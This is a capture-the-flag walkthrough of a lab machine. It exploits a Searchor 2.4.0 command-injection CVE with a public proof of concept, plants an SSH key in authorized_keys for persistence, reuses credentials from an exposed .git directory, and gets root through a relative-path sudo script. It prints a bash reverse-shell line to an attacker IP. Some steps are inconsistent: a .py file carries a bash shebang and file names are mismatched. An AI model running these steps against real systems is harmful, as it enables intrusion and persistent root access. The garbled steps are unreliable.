Enumeration

1
export target=10.129.47.156

Port Scanning

Add the domain to hosts:

1
sudo nano /etc/hosts

Web Application (port 80)

We see some kind of search engine: We see a version info on the footer: Searchor 2.4.0. Let’s search it if it is vulnerable.

After googling, we find out that there is a CVE (CVE-2023-43364) with a public exploit PoC.

https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection

Download the PoC:

1
git clone https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection.git

Run listener:

1
rlwrap -cAr nv -nlvp 9001

After executing the exploit, we get the reverse shell:

Get the user flag:

Persistence

Generate a key for ssh:

1
ssh-keygen -t ed25519 -f persist -N ''

Add your public key to .ssh/authorized_keys:

1
2
3
4
5
6
7
mkdir .ssh

chmod 700 .ssh

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMo+kBdPOoqbtwflRT59u/kXAOPLGlVcprRHz/75+zKw burak@kali" >> .ssh/authorized_keys

chmod 600 .ssh/authorized_keys

Then I can ssh to box:

1
ssh -i persist svc@10.129.47.156

Privilege Escalation

Let’s run linpeas right away:

We find a .git directory under /var/www/app, inside there is a credential of cody for gitea:

Add the gitea.researcher.htb to hosts, then login as cody:

Also we can try the credential on the current user, to see what we can run as root:

1
sudo -l

1
nano /tmp/system-checkup.py
1
2
3
#!bin/bash

bash -c 'bash -i >& /dev/tcp/10.10.14.57/9001 0>&1'
1
chmod +x /tmp/system-checkup.py

Save it as full-checkup.sh

Script uses relative path, so we can give it our script

Run listener on attack machine then,

1
/usr/bin/python3 /opt/scripts/system-checkup.py`

Root shell. Bum

Key Takeaways

  • The web application’s .git directory may be accessible; config files frequently contain hardcoded credentials.
  • Try every credential you find on all users in the system (credential reuse); especially for su, SSH, and web panel logins.
  • If a script run via sudo uses a relative path, you can create your own file with the same name to execute as root.